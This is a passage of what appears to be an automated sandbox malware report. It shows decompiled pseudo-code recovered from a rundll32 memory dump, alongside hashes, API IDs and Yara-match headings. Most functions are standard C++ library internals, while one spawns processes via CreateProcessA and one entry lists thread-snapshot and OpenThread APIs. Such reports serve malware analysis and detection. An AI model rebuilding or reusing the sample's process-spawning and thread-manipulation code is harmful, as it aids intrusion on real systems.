                • Instruction Fuzzy Hash: D0315033716E20D1EB219B16E9582D96365EFE47E0F280296DE9D077EDDE38D8468700
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 59%
                			E00000215215205EEEBC(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
                				char _v48;
                				long long _v56;
                				void* __rsi;
                				void* __rbp;
                				intOrPtr _t26;
                				void* _t29;
                				void* _t43;
                				intOrPtr _t51;
                				intOrPtr _t52;
                				intOrPtr _t53;
                				intOrPtr _t56;
                				signed long long _t57;
                				intOrPtr _t64;
                				intOrPtr* _t78;
                				long long _t79;
                				void* _t80;
                
                				_t51 = __rax;
                				_v56 = 0xfffffffe;
                				_a32 = __rbx;
                				_t80 = __rcx;
                				E00000215215205D19DC(0,  &_a16);
                				_t79 =  *0x20681cf0; // 0x0
                				_a24 = _t79;
                				_t56 =  *0x20681cb0; // 0x0
                				if (_t56 != 0) goto 0x205eef37;
                				E00000215215205D19DC(0,  &_a8);
                				_t43 =  *0x20681cb0 - _t56; // 0x0
                				if (_t43 != 0) goto 0x205eef26;
                				_t26 =  *0x20681908; // 0x0
                				 *0x20681908 = _t26 + 1;
                				 *0x20681cb0 = _t51;
                				_t29 = E00000215215205D1A5C(_t51,  &_a8);
                				_t57 =  *0x20681cb0; // 0x0
                				_t64 = _a8;
                				if (_t57 -  *((intOrPtr*)(_t64 + 0x18)) >= 0) goto 0x205eef4b;
                				_t52 =  *((intOrPtr*)(_t64 + 0x10));
                				goto 0x205eef4d;
                				if ( *((intOrPtr*)(_t52 + _t57 * 8)) != 0) goto 0x205eefda;
                				if ( *((intOrPtr*)(_t64 + 0x24)) == dil) goto 0x205eef73;
                				E00000215215205D6CC0(_t29);
                				if (_t57 -  *((intOrPtr*)(_t52 + 0x18)) >= 0) goto 0x205eef71;
                				_t53 =  *((intOrPtr*)(_t52 + 0x10));
                				goto 0x205eef73;
                				if ( *((intOrPtr*)(_t53 + _t57 * 8)) != 0) goto 0x205eefda;
                				if (_t79 == 0) goto 0x205eef82;
                				goto 0x205eefda;
                				E00000215215205EF74C(0, 0, _t57,  &_a24, _t80, _t79, _t80);
                				if (_t53 != 0xffffffff) goto 0x205eefb1;
                				E00000215215205B7290( &_v48);
                				E00000215215205F9940(_t57,  &_v48, 0x2066bb90, _t79);
                				asm("int3");
                				_t78 = _a24;
                				 *0x20681cf0 = _t78;
                				0x205f5ad4();
                				 *((long long*)( *((intOrPtr*)( *_t78 + 8))))();
                				return E00000215215205D1A5C(E00000215215205D6C88(_t53, _t78),  &_a16);
                			}




















                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow
                • String ID:
                • API String ID: 1824299764-0
                • Opcode ID: f43d10d2897e83d3bc7a87f3a56ab67e3edf265f2d0c7023e32dc3d5bba168d6
                • Instruction ID: 5ce2a349a2f2a5eecba81c7bb8c6940ab105966908293fc35f2a00f55f282faf
                • Opcode Fuzzy Hash: f43d10d2897e83d3bc7a87f3a56ab67e3edf265f2d0c7023e32dc3d5bba168d6
                • Instruction Fuzzy Hash: AB318D33316E60C1EA219B15E5582E96365EFF4BE0F280292EEAD477EDDF38D4528700
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 55%
                			E00000215215205F6B70(long long* __rax, long long __rbx, long long __rcx, void* __rdx, long long __rsi, void* __r8, char _a8, long long _a16, long long _a24) {
                				long long _v16;
                				long long _v32;
                				intOrPtr _v40;
                				void* __rdi;
                				intOrPtr _t22;
                				long long* _t39;
                				intOrPtr* _t41;
                				long long _t44;
                				intOrPtr* _t59;
                				intOrPtr _t67;
                				intOrPtr _t68;
                
                				_t46 = __rcx;
                				_t39 = __rax;
                				_a8 = __rcx;
                				_v32 = 0xfffffffe;
                				_a16 = __rbx;
                				_a24 = __rsi;
                				_t44 = __rcx;
                				_v40 = 0;
                				E00000215215205D6CC8(1, __rcx, __rsi, __r8);
                				_t59 = _t39;
                				_v16 = _t39;
                				E00000215215205F4DCC(_t39, _t46);
                				_t61 = _t39;
                				_a8 = _t39;
                				E00000215215205B76B0(0, _t44, _t39, _t59);
                				 *_t39 = 0x2062f5c0;
                				E00000215215205D6EBC(0x2062f5c0, _t59);
                				 *((long long*)(_t44 + 8)) = 0x2062f5c0;
                				_t67 =  *0x20681950; // 0x0
                				if (_t67 != 0) goto 0x205f6c23;
                				E00000215215205D19DC(0,  &_a8);
                				if ( *0x20681950 != 0) goto 0x205f6c12;
                				_t22 =  *0x20681908; // 0x0
                				 *0x20681908 = _t22 + 1;
                				 *0x20681950 = 0x2062f5c0;
                				E00000215215205D1A5C(0x2062f5c0,  &_a8);
                				_t68 =  *0x20681950; // 0x0
                				E00000215215205D48B8(_t44,  *((intOrPtr*)(_t44 + 8)), _t39, _t39, _t68);
                				 *((intOrPtr*)( *((intOrPtr*)(_t44 + 8)) + 0x20)) = 0;
                				E00000215215205BB6E0(0x2062f5c0, _t44,  *((intOrPtr*)(_t44 + 8)) + 0x28, "*", _t61);
                				if (_t59 == 0) goto 0x205f6c6d;
                				_t41 =  *_t59;
                				 *((intOrPtr*)(_t41 + 0x10))();
                				if (_t41 == 0) goto 0x205f6c6d;
                				return  *((intOrPtr*)( *_t41))();
                			}















                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockitstd::locale::_$Locimp::_$LocimpLockit::_Lockit::~_$Locinfo::_New_$AddfacGetcvtInitLocimp_Locinfo_ctorLocinfo_dtorSetgloballocale
                • String ID:
                • API String ID: 1918534443-0
                • Opcode ID: 278c38eeb202807922060e252e777835c6e01d8cf4eee63a8b468e00d0f92009
                • Instruction ID: dbbccf0dc3214853c92b4a447659d4852e5398513f42a937cf5300d59ea7590e
                • Opcode Fuzzy Hash: 278c38eeb202807922060e252e777835c6e01d8cf4eee63a8b468e00d0f92009
                • Instruction Fuzzy Hash: 2E216732602E90C5EB109F51E8583D9B3A4EBE5BD0F1482A6EE9D4779DDF38D8468700
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: CreateOpenThread32$CloseFirstHandleInstanceNextProcessSnapshotThreadToolhelp32
                • String ID:
                • API String ID: 684471368-0
                • Opcode ID: a37325f4b4b5c4bf5b81cf8654252723e457ad972ae9de76c6c9a21dc636ce4e
                • Instruction ID: da8c6e3beb6df53fe3ad06a049c1726f38c5a93bbe76f10d5b9370af3dc19def
                • Opcode Fuzzy Hash: a37325f4b4b5c4bf5b81cf8654252723e457ad972ae9de76c6c9a21dc636ce4e
                • Instruction Fuzzy Hash: 1C217A33716B54CAE750CF26A84869AB3A1FBD8B90F0850A4EF8947B69DF38D541CB40
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: _com_issue_error$AllocByteCharErrorLastMultiStringWide
                • String ID:
                • API String ID: 1412949955-0
                • Opcode ID: b63a3a2545f677ecc4ef4efd726bcd1bcedc8c36886d6ae56f796625dbe73bcb
                • Instruction ID: 79ec4f10976f9e34cba58893d6979de727da1107e8093b41a6d8ba1955f2c7e5
                • Opcode Fuzzy Hash: b63a3a2545f677ecc4ef4efd726bcd1bcedc8c36886d6ae56f796625dbe73bcb
                • Instruction Fuzzy Hash: 3F118F33301AA8C9EB189F32951D3E82395AFF6BD8F14445AAE4997B9ECE7CC4518341
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 31%
                			E00000215215205BDD20(void* __ecx, void* __edx, long long __rbx, long long __rcx, long long* __rdx) {
                				void* __rsi;
                				void* __rbp;
                				void* __r14;
                				void* __r15;
                				int _t93;
                				void* _t109;
                				long long _t116;
                				long long _t117;
                				long long _t118;
                				long long _t119;
                				intOrPtr _t126;
                				void* _t152;
                				void* _t154;
                				void* _t157;
                				void* _t158;
                				void* _t160;
                				void* _t161;
                				void* _t178;
                				intOrPtr* _t179;
                				long long _t181;
                				void* _t183;
                				long long* _t184;
                				void* _t186;
                				long long _t187;
                
                				_t110 = __edx;
                				_t109 = __ecx;
                				 *((long long*)(_t160 + 0x10)) = __rdx;
                				_t158 = _t160 - 0xa0;
                				_t161 = _t160 - 0x1a0;
                				 *((long long*)(_t158 - 0x18)) = 0xfffffffe;
                				 *((long long*)(_t161 + 0x1f8)) = __rbx;
                				_t184 = __rdx;
                				_t187 = __rcx;
                				r13d = 0;
                				 *((intOrPtr*)(_t161 + 0x50)) = r13d;
                				 *((long long*)(_t158 + 0xe0)) = __rcx;
                				E00000215215205C0000(__rbx,  *((intOrPtr*)(__rcx + 0xd8)), _t158 + 0xe0, _t154, _t158);
                				_t179 = _t187 + 0x80;
                				if ( *_t179 == r13d) goto 0x205bde34;
                				_t126 =  *((intOrPtr*)( *((intOrPtr*)(_t187 + 0xd8)) + 8));
                				_t116 =  *((intOrPtr*)(_t126 + 8));
                				 *((long long*)(_t158 - 0x60)) = _t116;
                				 *((long long*)(_t158 - 0x58)) = _t116;
                				 *((long long*)(_t158 - 0x50)) = _t181;
                				E00000215215205B9960(__edx, _t116, _t126, _t158 + 0x50, _t158,  *((intOrPtr*)(_t116 + 0x10)) + 0x68, _t158 - 0x60, __rdx, _t187, _t186, _t183);
                				_t117 =  *((intOrPtr*)(_t126 + 0x10));
                				 *((long long*)(_t158 - 0x48)) = _t117;
                				 *((long long*)(_t158 - 0x40)) = _t117;
                				 *((long long*)(_t158 - 0x38)) = _t181;
                				E00000215215205B9960(_t110, _t117, _t126, _t158 + 0x68, _t158,  *((intOrPtr*)(_t117 + 0x10)) + 0x68, _t158 - 0x48, __rdx, _t187, _t181, _t178);
                				_t118 =  *((intOrPtr*)(_t126 + 0x18));
                				 *((long long*)(_t158 - 0x30)) = _t118;
                				 *((long long*)(_t158 - 0x28)) = _t118;
                				 *((long long*)(_t158 - 0x20)) = _t181;
                				E00000215215205B9960(_t110, _t118, _t126, _t158 + 0x80, _t158,  *((intOrPtr*)(_t118 + 0x10)) + 8, _t158 - 0x30, __rdx, _t187, _t152, _t154);
                				 *__rdx = _t181;
                				 *((long long*)(__rdx + 8)) = _t181;
                				 *((long long*)(__rdx + 0x10)) = _t181;
                				E00000215215205BC940(_t118, __rdx + 0x18, _t158 + 0x80, _t157);
                				 *((short*)(__rdx + 0x28)) = 1;
                				 *((intOrPtr*)(_t161 + 0x50)) = 1;
                				goto 0x205be023;
                				_t119 =  *((intOrPtr*)(_t187 + 0x78));
                				 *((long long*)(_t161 + 0x48)) = _t187 + 0xe0;
                				 *((long long*)(_t161 + 0x40)) = _t119;
                				 *((long long*)(_t161 + 0x38)) =  *((intOrPtr*)(_t187 + 0xb8));
                				 *((long long*)(_t161 + 0x30)) =  *((intOrPtr*)(_t187 + 0xd0));
                				 *((intOrPtr*)(_t161 + 0x28)) =  *_t187;
                				 *((intOrPtr*)(_t161 + 0x20)) =  *((intOrPtr*)(_t187 + 0xb0));
                				_t93 = CreateProcessA(??, ??, ??, ??, ??, ??, ??, ??, ??, ??);
                				asm("movups xmm1, [esi]");
                				asm("movdqu [ebp-0x10], xmm1");
                				asm("movsd xmm0, [esi+0x10]");
                				asm("movsd [ebp], xmm0");
                				asm("movups [esp+0x58], xmm1");
                				asm("movsd [esp+0x68], xmm0");
                				asm("movdqa xmm0, [0x84874]");
                				asm("movdqu [ebp-0x10], xmm0");
                				asm("xorps xmm0, xmm0");
                				asm("movdqu [esp+0x70], xmm0");
                				if ( *((intOrPtr*)(_t187 + 0x98)) == 0) goto 0x205bdee2;
                				asm("lock inc ecx");
                				E00000215215205A1690(_t126, _t161 + 0x70,  *((intOrPtr*)(_t187 + 0x90)), _t187 + 0xe0, _t158,  *((intOrPtr*)(_t187 + 0x98)), __rdx);
                				 *(_t158 - 0x80) = 1;
                				CloseHandle(??);
                				CloseHandle(??);
                				if (_t93 == 0) goto 0x205bdfe2;
                				 *_t179 = r13d;
                				E00000215215205BC080(_t161 + 0x00000070 | 0xffffffffffffffff,  *((intOrPtr*)(_t187 + 0x90)));
                				 *((long long*)(_t179 + 8)) = _t119;
                				 *((long long*)(_t158 + 0xf0)) = _t187;
                				E00000215215205C0100(_t126,  *((intOrPtr*)(_t187 + 0xd8)), _t158 + 0xf0);
                				if ( *_t179 == 0) goto 0x205bdf8e;
                				 *((long long*)(_t158 - 0x70)) = _t187;
                				 *((long long*)(_t158 - 0x68)) = _t179;
                				asm("movaps xmm0, [ebp-0x70]");
                				asm("movdqa [ebp+0x30], xmm0");
                				E00000215215205BE660( *_t179, _t119,  *((intOrPtr*)(_t187 + 0xd8)));
                				 *_t184 = _t181;
                				 *((long long*)(_t184 + 8)) = _t181;
                				 *((long long*)(_t184 + 0x10)) = _t181;
                				E00000215215205BC940(_t119, _t184 + 0x18, _t158 + 0xf0);
                				 *((short*)(_t184 + 0x28)) = 1;
                				 *((intOrPtr*)(_t161 + 0x50)) = 1;
                				E00000215215205BA460(_t119, _t126, _t161 + 0x58, _t187 + 0xe0);
                				goto 0x205be023;
                				asm("movups xmm0, [esp+0x58]");
                				asm("inc ecx");
                				asm("movsd xmm1, [esp+0x68]");
                				asm("repne inc ecx");
                				asm("movdqa xmm0, [0x84785]");
                				asm("movdqu [esp+0x58], xmm0");
                				 *((long long*)(_t184 + 0x18)) =  *(_t161 + 0x70);
                				 *((long long*)(_t184 + 0x20)) =  *((intOrPtr*)(_t161 + 0x78));
                				asm("xorps xmm0, xmm0");
                				asm("movdqu [esp+0x70], xmm0");
                				 *((char*)(_t184 + 0x28)) =  *(_t158 - 0x80) & 0x000000ff;
                				 *((char*)(_t184 + 0x29)) =  *(_t158 - 0x7f) & 0x000000ff;
                				 *(_t158 - 0x80) = 0;
                				goto 0x205bdf77;
                				E00000215215205B86E0( *((intOrPtr*)(_t161 + 0x78)), _t126, _t158 + 0x40);
                				asm("movups xmm0, [eax]");
                				asm("movaps [ebp-0x70], xmm0");
                				E00000215215205B80C0(_t109, _t110, _t126, _t158 + 8, _t158 - 0x70, _t187 + 0xe0, _t158, " CreateProcess failed");
                				 *((long long*)(_t158 + 8)) = 0x2063fa28;
                				return E00000215215205F9940(_t126, _t158 + 8, 0x2066bb58, _t187 + 0xe0);
                			}

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: CloseHandle$CreateErrorExceptionLastProcessThrow
                • String ID: CreateProcess failed
                • API String ID: 4160235580-2682455881
                • Opcode ID: 640137e91375ac19db5ae25c6535f8ce21ea7dfe50142579e9fc247d86508d75
                • Instruction ID: a2e0c3da26587049217128978decdd9097656ec33e8a395659d854cc199b6252
                • Opcode Fuzzy Hash: 640137e91375ac19db5ae25c6535f8ce21ea7dfe50142579e9fc247d86508d75
                • Instruction Fuzzy Hash: 6C917733A01FA0C9E310DF64E8487DE77B4FB99768F515206EE9853A99EB74C185C340
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E000002152152058C510(signed int __eax, intOrPtr* __rcx) {
                				intOrPtr _t44;
                				signed long long _t45;
                				signed long long _t49;
                				signed long long _t51;
                				signed long long _t53;
                				unsigned long long _t55;
                				intOrPtr _t59;
                				void* _t62;
                				intOrPtr _t66;
                
                				_t44 =  *((intOrPtr*)(__rcx + 0x10));
                				_t59 =  *((intOrPtr*)(__rcx + 8));
                				_t49 = _t44 - _t59;
                				_t51 = (_t49 >> 3) + (_t49 >> 3 >> 0x3f);
                				if (_t51 - 1 >= 0) goto 0x2058c5c2;
                				_t66 =  *__rcx;
                				_t53 = (_t51 >> 3) + (_t51 >> 3 >> 0x3f);
                				if (0xc71c71c7 - _t53 - 1 < 0) goto 0x2058c5c8;
                				_t45 = _t44 - _t66;
                				_t11 = _t53 + 1; // 0x1c71c71c71c71c8
                				_t55 = (_t53 >> 3) + (_t53 >> 3 >> 0x3f);
                				_t46 =  >=  ? (_t55 >> 1) + _t55 : _t45;
                				_t62 =  >=  ?  >=  ? (_t55 >> 1) + _t55 : _t45 : _t11;
                				goto 0x2058c700;
                				return __eax * _t49 * (_t59 - _t66) * _t45;
                			}

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Concurrency::cancel_current_task
                • String ID: vector<T> too long
                • API String ID: 118556049-3788999226
                • Opcode ID: 209fec1007478916acfdcb20c5a00d356bdbdf414fd75cbb4a1670f75066db18
                • Instruction ID: 7973348266ce46f2780211b4af34ba3cb03fcf464aeeb6d070caf882f7c46f02
                • Opcode Fuzzy Hash: 209fec1007478916acfdcb20c5a00d356bdbdf414fd75cbb4a1670f75066db18
                • Instruction Fuzzy Hash: 355108F3712B98C2ED14CB66E8092D96351FBA8BD0F148225DFAD4B7D9DB78D5818300
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 86%
                			E00000215215205C0320(signed char __ecx, void* __rcx, long long __rdi, long long __rsi, long long __r12, long long __r13, long long __r14, long long __r15) {
                				void* _t47;
                				signed char _t49;
                				void* _t52;
                				void* _t53;
                				void* _t54;
                				void* _t58;
                				long long _t76;
                				signed long long _t77;
                				intOrPtr _t79;
                				void* _t80;
                				void* _t81;
                				signed long long _t83;
                				intOrPtr _t85;
                				signed long long _t86;
                				signed int _t87;
                				intOrPtr _t96;
                				void* _t97;
                				void* _t120;
                				void* _t121;
                				long long _t140;
                				signed long long _t144;
                
                				_t49 = __ecx;
                				_t120 = __rcx;
                				_t85 =  *((intOrPtr*)(__rcx + 0x10));
                				_t81 =  !=  ? _t85 : _t80;
                				if (_t81 - _t85 - 1 < 0) goto 0x205c0356;
                				if (_t81 - 8 >= 0) goto 0x205c036a;
                				_t58 = 0xffffffff - _t81 - _t81;
                				if (_t58 < 0) goto 0x205c0536;
                				goto 0x205c0344;
                				 *((long long*)(_t121 + 0x28)) = __r14;
                				_t83 = _t81 + _t81 - _t85;
                				 *((long long*)(_t121 + 0x20)) = __r15;
                				_t144 =  *(__rcx + 0x18) >> 4;
                				_t86 = _t85 + _t83;
                				if (_t58 != 0) goto 0x205c0393;
                				r14d = 0;
                				goto 0x205c03d8;
                				if (_t86 - 0xffffffff > 0) goto 0x205c050c;
                				_t87 = _t86 * 8;
                				if (_t87 - 0x1000 < 0) goto 0x205c03d0;
                				_t76 = _t87 + 0x27;
                				if (_t76 - _t87 <= 0) goto 0x205c0512;
                				E00000215215205F4DCC(_t76, _t76);
                				_t7 = _t76 + 0x27; // 0x27
                				 *((long long*)((_t7 & 0xffffffe0) - 8)) = _t76;
                				goto 0x205c03d8;
                				E00000215215205F4DCC(_t76, _t76);
                				_t140 = _t76;
                				 *((long long*)(_t121 + 0x50)) = __rsi;
                				 *((long long*)(_t121 + 0x58)) = __rdi;
                				 *((long long*)(_t121 + 0x60)) = __r12;
                				_t132 = _t144 * 8;
                				 *((long long*)(_t121 + 0x30)) = __r13;
                				E00000215215205F7310(__ecx, _t52, _t53, _t54, _t144 * 8 + _t140,  *((intOrPtr*)(_t120 + 8)) + _t144 * 8, ( *(_t120 + 0x10) << 3) -  *((intOrPtr*)(_t120 + 8)) + _t144 * 8 +  *((intOrPtr*)(_t120 + 8)), _t144 * 8 + _t140, ( *(_t120 + 0x10) << 3) -  *((intOrPtr*)(_t120 + 8)) + _t144 * 8 +  *((intOrPtr*)(_t120 + 8)));
                				if (_t144 - _t83 > 0) goto 0x205c0457;
                				E00000215215205F7310(_t49, _t52, _t53, _t54, ( *(_t120 + 0x10) << 3) -  *((intOrPtr*)(_t120 + 8)) + _t144 * 8 +  *((intOrPtr*)(_t120 + 8)) + _t144 * 8 + _t140,  *((intOrPtr*)(_t120 + 8)),  *((intOrPtr*)(_t120 + 8)) -  *((intOrPtr*)(_t120 + 8)) + _t132, _t144 * 8 + _t140,  *((intOrPtr*)(_t120 + 8)) -  *((intOrPtr*)(_t120 + 8)) + _t132);
                				E00000215215205F8EF0(_t49, 0, _t52, _t54,  *((intOrPtr*)(_t120 + 8)) -  *((intOrPtr*)(_t120 + 8)) + _t132 + ( *(_t120 + 0x10) << 3) -  *((intOrPtr*)(_t120 + 8)) + _t144 * 8 +  *((intOrPtr*)(_t120 + 8)) + _t144 * 8 + _t140,  *((intOrPtr*)(_t120 + 8)),  *((intOrPtr*)(_t120 + 8)) -  *((intOrPtr*)(_t120 + 8)) + _t132, _t83 - _t144 << 3);
                				goto 0x205c0487;
                				_t118 = _t83 * 8;
                				E00000215215205F7310(_t49, _t52, _t53, _t54, _t140,  *((intOrPtr*)(_t120 + 8)),  *((intOrPtr*)(_t120 + 8)) -  *((intOrPtr*)(_t120 + 8)) + _t132, _t83 * 8, _t83 * 8);
                				E00000215215205F7310(_t49, _t52, _t53, _t54, _t140, _t83 * 8 +  *((intOrPtr*)(_t120 + 8)),  *((intOrPtr*)(_t120 + 8)) - _t83 * 8 +  *((intOrPtr*)(_t120 + 8)) + _t132, _t118,  *((intOrPtr*)(_t120 + 8)) - _t83 * 8 +  *((intOrPtr*)(_t120 + 8)) + _t132);
                				_t47 = E00000215215205F8EF0(_t49, 0, _t52, _t54,  *((intOrPtr*)(_t120 + 8)) - _t83 * 8 +  *((intOrPtr*)(_t120 + 8)) + _t132 + _t140, _t83 * 8 +  *((intOrPtr*)(_t120 + 8)),  *((intOrPtr*)(_t120 + 8)) - _t83 * 8 +  *((intOrPtr*)(_t120 + 8)) + _t132, _t118);
                				_t96 =  *((intOrPtr*)(_t120 + 8));
                				if (_t96 == 0) goto 0x205c04f3;
                				_t77 =  *(_t120 + 0x10);
                				if (_t77 - 0xffffffff > 0) goto 0x205c0518;
                				if (_t77 * 8 - 0x1000 < 0) goto 0x205c04ee;
                				if ((_t49 & 0x0000001f) != 0) goto 0x205c051e;
                				_t79 =  *((intOrPtr*)(_t96 - 8));
                				if (_t79 - _t96 >= 0) goto 0x205c0524;
                				_t97 = _t96 - _t79;
                				if (_t97 - 8 < 0) goto 0x205c052a;
                				if (_t97 - 0x27 > 0) goto 0x205c0530;
                				0x205f51e4();
                				 *((long long*)(_t120 + 8)) = _t140;
                				 *(_t120 + 0x10) =  *(_t120 + 0x10) + _t83;
                				return _t47;
                			}

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Concurrency::cancel_current_task
                • String ID: deque<T> too long
                • API String ID: 118556049-309773918
                • Opcode ID: 0d65d9164c7f66487570ee0a705990e6b20f88b82d8624f38ea5cdcaf19dcb6c
                • Instruction ID: c91284292946446f33a4df832d1656eb34d9e7be20d4da36e7cc3c3c102b7fd9
                • Opcode Fuzzy Hash: 0d65d9164c7f66487570ee0a705990e6b20f88b82d8624f38ea5cdcaf19dcb6c
                • Instruction Fuzzy Hash: D4519B73313EA4D6EE149B61A50C3EE6351AFA9BF4F540A61AE6D07BDEDA78C1418300
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E000002152152059DCB0(void* __eax, void* __rcx, long long __rdx, void* __r8, long long __r9, long long _a16, long long _a32, long long _a40) {
                				intOrPtr _t50;
                				intOrPtr _t51;
                
                				_a32 = __r9;
                				_a16 = __rdx;
                				if (__rcx == __r8) goto 0x2059dce6;
                				_t50 =  *((intOrPtr*)(__rcx + 8));
                				if (0x66666665 - _t50 - 1 < 0) goto 0x2059dd4a;
                				 *((long long*)(__rcx + 8)) = _t50 + 1;
                				 *((long long*)(__r8 + 8)) =  *((long long*)(__r8 + 8)) - 1;
                				 *((long long*)( *((intOrPtr*)(__r9 + 8)))) = _a40;
                				 *((long long*)( *((intOrPtr*)(_a40 + 8)))) = _a16;
                				 *((long long*)( *((intOrPtr*)(_a16 + 8)))) = _a32;
                				_t51 = _a16;
                				 *((long long*)(_t51 + 8)) =  *((intOrPtr*)(_a40 + 8));
                				 *((long long*)(_a40 + 8)) =  *((intOrPtr*)(_a32 + 8));
                				 *((long long*)(_a32 + 8)) =  *((intOrPtr*)(_t51 + 8));
                				return __eax;
                			}

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Concurrency::cancel_current_task$ExceptionThrowstd::bad_alloc::bad_alloc
                • String ID: list<T> too long
                • API String ID: 2386360001-4027344264
                • Opcode ID: 8c3d43a86d18826729c4a74967e66e581c383eb1c22cc10e142ec2daa4007e92
                • Instruction ID: b9dd7d885344548a09118d19e00c1a19ed3e916722a42150318d58afbad385f4
                • Opcode Fuzzy Hash: 8c3d43a86d18826729c4a74967e66e581c383eb1c22cc10e142ec2daa4007e92
                • Instruction Fuzzy Hash: 72513677302F98C1DE00DB16E488299B7A4FB98BE0F158622EE9D477A8DF78D491C700
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00000215215205C0E50(void* __eax, intOrPtr* __rcx) {
                				intOrPtr _t18;
                				intOrPtr _t21;
                				signed long long _t23;
                				void* _t25;
                				intOrPtr _t29;
                				unsigned long long _t31;
                
                				_t29 =  *((intOrPtr*)(__rcx + 0x10));
                				_t21 =  *((intOrPtr*)(__rcx + 8));
                				if (_t29 - _t21 >> 5 - 1 >= 0) goto 0x205c0ec1;
                				_t18 =  *__rcx;
                				_t23 = _t21 - _t18 >> 5;
                				if (0xffffffff - _t23 - 1 < 0) goto 0x205c0ec6;
                				_t31 = _t29 - _t18 >> 5;
                				_t19 =  >=  ? (_t31 >> 1) + _t31 : _t18;
                				_t25 =  >=  ?  >=  ? (_t31 >> 1) + _t31 : _t18 : _t23 + 1;
                				goto 0x205c0ee0;
                				return __eax;
                			}

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Concurrency::cancel_current_task$ExceptionThrowstd::bad_alloc::bad_alloc
                • String ID: vector<T> too long
                • API String ID: 2386360001-3788999226
                • Opcode ID: a7aa5a6b28ac71769eafe1970d5e215efe742c92e9207db98cb8ee0b94ba8cf7
                • Instruction ID: 5ac40ddaa0c49e99eb8c02d708aa41c6ad4ee2df785804c0a10e742d022bf366
                • Opcode Fuzzy Hash: a7aa5a6b28ac71769eafe1970d5e215efe742c92e9207db98cb8ee0b94ba8cf7
                • Instruction Fuzzy Hash: E831D5B3713FA4C1ED249B56A40C6DA6264FFA4BF0F2657659E7D077D9DA78C0828300
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00000215215205BCDF0(void* __eax, intOrPtr* __rcx) {
                				intOrPtr _t18;
                				intOrPtr _t21;
                				signed long long _t23;
                				void* _t25;
                				intOrPtr _t29;
                				unsigned long long _t31;
                
                				_t29 =  *((intOrPtr*)(__rcx + 0x10));
                				_t21 =  *((intOrPtr*)(__rcx + 8));
                				if (_t29 - _t21 >> 3 - 1 >= 0) goto 0x205bce61;
                				_t18 =  *__rcx;
                				_t23 = _t21 - _t18 >> 3;
                				if (0xffffffff - _t23 - 1 < 0) goto 0x205bce66;
                				_t31 = _t29 - _t18 >> 3;
                				_t19 =  >=  ? (_t31 >> 1) + _t31 : _t18;
                				_t25 =  >=  ?  >=  ? (_t31 >> 1) + _t31 : _t18 : _t23 + 1;
                				goto 0x205bcf00;
                				return __eax;
                			}

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Concurrency::cancel_current_task
                • String ID: vector<T> too long
                • API String ID: 118556049-3788999226
                • Opcode ID: cf9c549b1c476fdb4d5ff33ebff3ea372f693d11d334e207372d9e47b2696e50
                • Instruction ID: f81c62c3d826d3220bc7a7c94fb430846bf888c28063b222cd525858ad41440d
